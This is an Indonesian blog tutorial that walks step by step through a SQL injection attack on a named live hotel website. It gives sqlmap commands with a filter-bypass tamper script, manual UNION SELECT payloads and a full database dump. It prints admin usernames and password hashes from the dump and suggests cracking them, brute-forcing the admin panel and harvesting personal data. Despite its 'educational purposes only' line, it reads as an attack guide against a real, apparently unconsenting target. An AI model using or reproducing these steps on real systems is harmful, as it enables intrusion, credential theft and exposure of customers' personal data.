Panduan menggunakan sqlmap live target

Panduan SQL Injection embryohotel.com

Panduan Lengkap SQL Injection dengan sqlmap

By 0x6ick

Live

  • http://www.embryohotel.com/room-detail.php?id=1
  • Pendahuluan

    SQL Injection (SQLi) adalah celah keamanan kritis yang memungkinkan penyerang mengakses atau memanipulasi database melalui input yang tidak divalidasi dengan baik. Artikel ini akan memandu langkah demi langkah eksploitasi SQLi pada situs www.embryohotel.com menggunakan sqlmap.

    1. Persiapan dan Pemeriksaan Awal

    sqlmap -u "http://www.embryohotel.com/room-detail.php?id=1" --user-agent="Mozilla/5.0" --random-agent

    Saat pertama dijalankan, sqlmap tidak langsung menemukan kerentanan karena kemungkinan ada WAF atau filter khusus.

    2. Bypass Proteksi dengan Tamper Script

    sqlmap -u "http://www.embryohotel.com/room-detail.php?id=1" --random-agent --tamper=space2comment

    Tamper script space2comment berhasil melewati filter dan sqlmap mendeteksi parameter id sebagai vulnerable.

    3. Identifikasi Kolom dan Teknik SQLi

    Sqlmap mendeteksi UNION query dengan 13 kolom dan output terlihat pada kolom ke-3.

    4. Payload Manual UNION SELECT

    ?id=-1 UNION SELECT NULL,NULL,'test6z',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+

    Jika muncul tulisan test6z, maka payload sukses.

    5. Payload Menampilkan Data Database

    ?id=-1 UNION SELECT NULL,NULL,CONCAT_WS(0x3a,user(),database(),version()),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+

    Output: user:db:version

    6. Dump Data Otomatis dengan sqlmap

    sqlmap -u "http://www.embryohotel.com/room-detail.php?id=1" --random-agent --union-cols=13 -p id --technique=U --dump --batch

    Hasil dump tersimpan di folder output/sqlmap.

    cd /data/data/com.termux/files/home/.local/share/sqlmap/output/www.embryohotel.com
    lihat hasil
    ls
    dump/
    log
    session.sqlite
    target.txt
    masuk ke folder dump
    cd dump
    ls

    7. Contoh Tabel Hasil Dump (admin.csv)

    id password username permission last_insert last_update
    1 e742c63f03ab602f2b38433ffc28b5145ba1332d admin 1 2016-10-15 00:00:00 2018-11-07 02:10:47
    2 8988c8cb582506f93b59b794af7212cb5406dfcf ARMERX 0 2020-02-11 10:58:49 2020-02-11 10:58:49
    geser cok

    8. Langkah Selanjutnya

    • Crack password hash dengan john atau hashcat
    • Eksplorasi panel admin menggunakan brute-forcing (gobuster, dirb)
    • Analisa tabel lainnya seperti contact.csv untuk data personal

    9. Kesimpulan

    Situs embryohotel.com memiliki kerentanan SQL Injection pada parameter id di room-detail.php. Teknik UNION query injection berhasil digunakan untuk mendapatkan akses database, termasuk hash password admin.

    ⚠️ For educational purposes only. We do not condone illegal use.”
    ;)

    Post a Comment

    Lebih baru Lebih lama